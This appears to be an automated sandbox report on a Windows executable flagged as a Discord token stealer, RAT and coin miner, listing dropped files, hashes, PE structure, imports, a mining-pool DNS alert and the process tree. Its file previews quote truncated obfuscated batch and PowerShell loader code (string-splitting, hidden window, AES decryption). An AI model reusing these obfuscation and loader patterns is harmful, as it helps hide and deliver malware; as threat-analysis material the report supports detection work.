    pool.hashvault.pro | hacn.exe | malicious | Discord Token Stealer, Millenuim RAT, Xmrig | 142.202.242.45
                                    No context
                                    No context
                                    No context
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9713
                                    Entropy (8bit):4.93568648418653
                                    Encrypted:false
                                    SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o
                                    MD5:A7EDDF0DCC37957ABAFE63CE6D0BE4CA
                                    SHA1:5B09680EF1C3C405D698481E1364BE0C412C7A9C
                                    SHA-256:B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327
                                    SHA-512:A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73
                                    Malicious:false
                                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2832
                                    Entropy (8bit):5.323151611696966
                                    Encrypted:false
                                    SSDEEP:48:6AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4Gx3axIZVEouNHJBV7/jCU:6AzlHYvIIfLz9qrh7KrjPEo2BN
                                    MD5:BABD377B4CD779342389D59986F8B60A
                                    SHA1:A8B4B408508AFFFEB0D7179A43732B5625E9F25F
                                    SHA-256:3C371F57A6BB2838F64BEE1F475500A3A8F012659927B17FCD54F8DEB2B5BE8D
                                    SHA-512:B265452E22DA1AFF899C15FB5993D4EA07A0F0958AB82FE2E4EE6AD3355B51E72252A081FFB2EEAA2D0E5F2762FCB3ED890128456B75AFAF3B2F44341D49E22F
                                    Malicious:false
                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:DOS batch file, ASCII text, with very long lines (65224), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6600802
                                    Entropy (8bit):6.001268811099209
                                    Encrypted:false
                                    SSDEEP:49152:UCDi7jJ5Zk7Z4msitjW9VKbIDf3lDN7y49Xo7IztgfgfSw07KaT3nHYB3OMHK1Ml:K
                                    MD5:2ABCB1711E177E29691EA8EE499E29F6
                                    SHA1:308EE8F4AF06199342075B17EA48FADC1734B636
                                    SHA-256:A89D5D1E3559F1EA719F642C1EBA7A6F7C00B11473D02542C91F4578C0AF54E9
                                    SHA-512:C8211787681DBD34A2D2D2B56F8D49F1DAADD28CC13B6EDD9BA2E57CA4C76C93FE9363419D09032D167085215EB8E8C85D7EB3515AB96EE3EB6A6A39702EBF82
                                    Malicious:true
                                    Preview:@echo off..set "geyBcW=sezSPYdt zSPYdAzSPYdNzSPYdvTzSPYd=zSPYd1zSPYd zSPYd&&zSPYd szSPYdtzSPYdazSPYdrtzSPYd zSPYd"" zSPYd/mzSPYdin zSPYd"..set "HbaGpB=&&zSPYd zSPYdexzSPYditzSPYd"..set "CknmIU=nozSPYdt zSPYddezSPYdfizSPYdnzSPYdedzSPYd AzSPYdNzSPYdvTzSPYd..if %CknmIU:zSPYd=% (%geyBcW:zSPYd=%%0 %HbaGpB:zSPYd=%)..::
                                    Process:C:\Users\user\Desktop\file.exe
                                    File Type:DOS batch file, ASCII text, with very long lines (65224), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6600802
                                    Entropy (8bit):6.001268811099209
                                    Encrypted:false
                                    SSDEEP:49152:UCDi7jJ5Zk7Z4msitjW9VKbIDf3lDN7y49Xo7IztgfgfSw07KaT3nHYB3OMHK1Ml:K
                                    MD5:2ABCB1711E177E29691EA8EE499E29F6
                                    SHA1:308EE8F4AF06199342075B17EA48FADC1734B636
                                    SHA-256:A89D5D1E3559F1EA719F642C1EBA7A6F7C00B11473D02542C91F4578C0AF54E9
                                    SHA-512:C8211787681DBD34A2D2D2B56F8D49F1DAADD28CC13B6EDD9BA2E57CA4C76C93FE9363419D09032D167085215EB8E8C85D7EB3515AB96EE3EB6A6A39702EBF82
                                    Malicious:false
                                    Preview:@echo off..set "geyBcW=sezSPYdt zSPYdAzSPYdNzSPYdvTzSPYd=zSPYd1zSPYd zSPYd&&zSPYd szSPYdtzSPYdazSPYdrtzSPYd zSPYd"" zSPYd/mzSPYdin zSPYd"..set "HbaGpB=&&zSPYd zSPYdexzSPYditzSPYd"..set "CknmIU=nozSPYdt zSPYddezSPYdfizSPYdnzSPYdedzSPYd AzSPYdNzSPYdvTzSPYd..if %CknmIU:zSPYd=% (%geyBcW:zSPYd=%%0 %HbaGpB:zSPYd=%)..::
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (2170), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):2172
                                    Entropy (8bit):5.706976468899462
                                    Encrypted:false
                                    SSDEEP:48:sJFbrLKWgSLkV4Dz/65v4CKNOAw0RFRJRx9BVRBVUk/k3/muZ27eVAPgJJYVAPBi:GbF/eQiU7Pnv79BjBuvKZiJzZi
                                    MD5:7B4BC55FE65DF07FFF273C177443129F
                                    SHA1:13963DF4293DC2AC3B9FC0F9E17BFA9C7263910D
                                    SHA-256:8DE36594B5BEA3C0785635D646913473DF7F1C4ED008DB257CC55EFC8F06BDF8
                                    SHA-512:07742D2E098D39456EA25FE31293332667C2987CDD420CED595755ABF01FAC4FF531929F263A916FF17913BB0D3349FD0E9F57D6395FDE87B5C4F9FE20D87E1B
                                    Malicious:false
                                    Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):7.9617541743927625
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.65%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:5'553'078 bytes
                                    MD5:6d075d047098d57266aa59b97d288bda
                                    SHA1:1cb3eabf3ddbf47ea0f9eebac64b6689f7645cc1
                                    SHA256:fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39
                                    SHA512:9167cabbeca956b977d2ec2e88f8d1c03511d2271850df7e1d01e1b2fd76ac4534e782c236ad28fe92cee94b289a8c8ba74f1ec35b9028b70339adc4af3dfa69
                                    SSDEEP:98304:+3G06n81vgUXP6+UXGLVk+3UXLtIhLuzXAapVgPrvqE3LDvuseWMeX:+3Gdn4oQP6L+3MLOJuzXXTgzP3ZeWF
                                    TLSH:7446330AFBA505F9E1A7A278CE470D16E2797C4D53718ACF2362162E1F273608E3B751
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                    Icon Hash:1515d4d4442f2d2d
                                    Entrypoint:0x140032e60
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x65DC537B [Mon Feb 26 09:01:47 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:2
                                    File Version Major:5
                                    File Version Minor:2
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:2
                                    Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    call 00007F2698867B98h
                                    dec eax
                                    add esp, 28h
                                    jmp 00007F269886752Fh
                                    int3
                                    int3
                                    dec eax
                                    mov eax, esp
                                    dec eax
                                    mov dword ptr [eax+08h], ebx
                                    dec eax
                                    mov dword ptr [eax+10h], ebp
                                    dec eax
                                    mov dword ptr [eax+18h], esi
                                    dec eax
                                    mov dword ptr [eax+20h], edi
                                    inc ecx
                                    push esi
                                    dec eax
                                    sub esp, 20h
                                    dec ebp
                                    mov edx, dword ptr [ecx+38h]
                                    dec eax
                                    mov esi, edx
                                    dec ebp
                                    mov esi, eax
                                    dec eax
                                    mov ebp, ecx
                                    dec ecx
                                    mov edx, ecx
                                    dec eax
                                    mov ecx, esi
                                    dec ecx
                                    mov edi, ecx
                                    inc ecx
                                    mov ebx, dword ptr [edx]
                                    dec eax
                                    shl ebx, 04h
                                    dec ecx
                                    add ebx, edx
                                    dec esp
                                    lea eax, dword ptr [ebx+04h]
                                    call 00007F26988669B3h
                                    mov eax, dword ptr [ebp+04h]
                                    and al, 66h
                                    neg al
                                    mov eax, 00000001h
                                    sbb edx, edx
                                    neg edx
                                    add edx, eax
                                    test dword ptr [ebx+04h], edx
                                    je 00007F26988676C3h
                                    dec esp
                                    mov ecx, edi
                                    dec ebp
                                    mov eax, esi
                                    dec eax
                                    mov edx, esi
                                    dec eax
                                    mov ecx, ebp
                                    call 00007F26988696D7h
                                    dec eax
                                    mov ebx, dword ptr [esp+30h]
                                    dec eax
                                    mov ebp, dword ptr [esp+38h]
                                    dec eax
                                    mov esi, dword ptr [esp+40h]
                                    dec eax
                                    mov edi, dword ptr [esp+48h]
                                    dec eax
                                    add esp, 20h
                                    inc ecx
                                    pop esi
                                    ret
                                    int3
                                    int3
                                    int3
                                    dec eax
                                    sub esp, 48h
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F2698855F43h
                                    dec eax
                                    lea edx, dword ptr [000257C7h]
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F2698868792h
                                    int3
                                    jmp 00007F269886E974h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    Data directories
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x597a0 | 0x34 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x597d4 | 0x50 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0xe3bc | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6a000 | 0x306c | .pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7f000 | 0x970 | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x536c0 | 0x54 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x53780 | 0x28 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b3f0 | 0x140 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x48000 | 0x508 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x588bc | 0x120 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Sections
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x466ee | 0x46800 | 27edb25a1bc32573014bf3adb5cecc24 | False | 0.536860039893617 | data | 6.469383562827248 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x48000 | 0x128c4 | 0x12a00 | cde5f7a0fae18bcdb38da9f29d7f3313 | False | 0.449834836409396 | data | 5.269838116965451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x5b000 | 0xe75c | 0x1a00 | 0a420650d3abfc14c296cd4945b33a1d | False | 0.28260216346153844 | data | 3.2569573130951395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata | 0x6a000 | 0x306c | 0x3200 | 95c27b680fbce994429e951f39e7a9ad | False | 0.487734375 | data | 5.502914123440489 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .didat | 0x6e000 | 0x360 | 0x400 | 53c09865fd6da5cc74254921d9575e3d | False | 0.259765625 | data | 3.025278137091312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    _RDATA | 0x6f000 | 0x15c | 0x200 | 58d3584c9c50f7594166c2ade479252f | False | 0.40234375 | data | 3.307334517307356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x70000 | 0xe3bc | 0xe400 | 1b279dad3e3d77fcdfb269a130bf474b | False | 0.6334121436403509 | data | 6.778407783727912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x7f000 | 0x970 | 0xa00 | 77a9ddfc47a5650d6eebbcc823e39532 | False | 0.52421875 | data | 5.336289720085303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Resources
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    PNG | 0x70674 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
                                    PNG | 0x711bc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
                                    RT_ICON | 0x72768 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534
                                    RT_ICON | 0x72cd0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585
                                    RT_ICON | 0x73578 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034
                                    RT_ICON | 0x74420 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816
                                    RT_ICON | 0x74888 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843
                                    RT_ICON | 0x75930 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195
                                    RT_ICON | 0x77ed8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401
                                    RT_DIALOG | 0x7bc4c | 0x2ba | data | | | 0.5286532951289399
                                    RT_DIALOG | 0x7bf08 | 0x13a | data | | | 0.6560509554140127
                                    RT_DIALOG | 0x7c044 | 0xf2 | data | | | 0.71900826446281
                                    RT_DIALOG | 0x7c138 | 0x14a | data | | | 0.6
                                    RT_DIALOG | 0x7c284 | 0x314 | data | | | 0.47588832487309646
                                    RT_DIALOG | 0x7c598 | 0x24a | data | | | 0.6279863481228669
                                    RT_STRING | 0x7c7e4 | 0x1fc | data | | | 0.421259842519685
                                    RT_STRING | 0x7c9e0 | 0x246 | data | | | 0.41924398625429554
                                    RT_STRING | 0x7cc28 | 0x1a6 | data | | | 0.514218009478673
                                    RT_STRING | 0x7cdd0 | 0xdc | data | | | 0.65
                                    RT_STRING | 0x7ceac | 0x470 | data | | | 0.3873239436619718
                                    RT_STRING | 0x7d31c | 0x164 | data | | | 0.5056179775280899
                                    RT_STRING | 0x7d480 | 0x110 | data | | | 0.5772058823529411
                                    RT_STRING | 0x7d590 | 0x158 | data | | | 0.4563953488372093
                                    RT_STRING | 0x7d6e8 | 0xe8 | data | | | 0.5948275862068966
                                    RT_STRING | 0x7d7d0 | 0x1c6 | data | | | 0.5242290748898678
                                    RT_STRING | 0x7d998 | 0x268 | data | | | 0.4837662337662338
                                    RT_GROUP_ICON | 0x7dc00 | 0x68 | data | | | 0.7019230769230769
                                    RT_MANIFEST | 0x7dc68 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333
                                    Imports
                                    DLL | Import
                                    KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                    OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                    gdiplus.dll | GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
                                    Snort IDS alerts
                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    04/19/24-03:21:07.355283 | UDP | 2036289 | ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 57977 | 53 | 192.168.2.4 | 1.1.1.1

                                    UDP packets
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Apr 19, 2024 03:21:07.355283022 CEST | 57977 | 53 | 192.168.2.4 | 1.1.1.1
                                    Apr 19, 2024 03:21:07.461335897 CEST | 53 | 57977 | 1.1.1.1 | 192.168.2.4

                                    DNS queries
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Apr 19, 2024 03:21:07.355283022 CEST | 192.168.2.4 | 1.1.1.1 | 0xe38b | Standard query (0) | pool.hashvault.pro | A (IP address) | IN (0x0001) | false

                                    DNS answers
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Apr 19, 2024 03:21:07.461335897 CEST | 1.1.1.1 | 192.168.2.4 | 0xe38b | No error (0) | pool.hashvault.pro | | 142.202.242.43 | A (IP address) | IN (0x0001) | false
                                    Apr 19, 2024 03:21:07.461335897 CEST | 1.1.1.1 | 192.168.2.4 | 0xe38b | No error (0) | pool.hashvault.pro | | 142.202.242.45 | A (IP address) | IN (0x0001) | false


                                    Target ID:0
                                    Start time:03:19:00
                                    Start date:19/04/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0x7ff65a350000
                                    File size:5'553'078 bytes
                                    MD5 hash:6D075D047098D57266AA59B97D288BDA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd"
                                    Imagebase:0x7ff6d25d0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:03:19:01
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:5
                                    Start time:03:19:02
                                    Start date:19/04/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
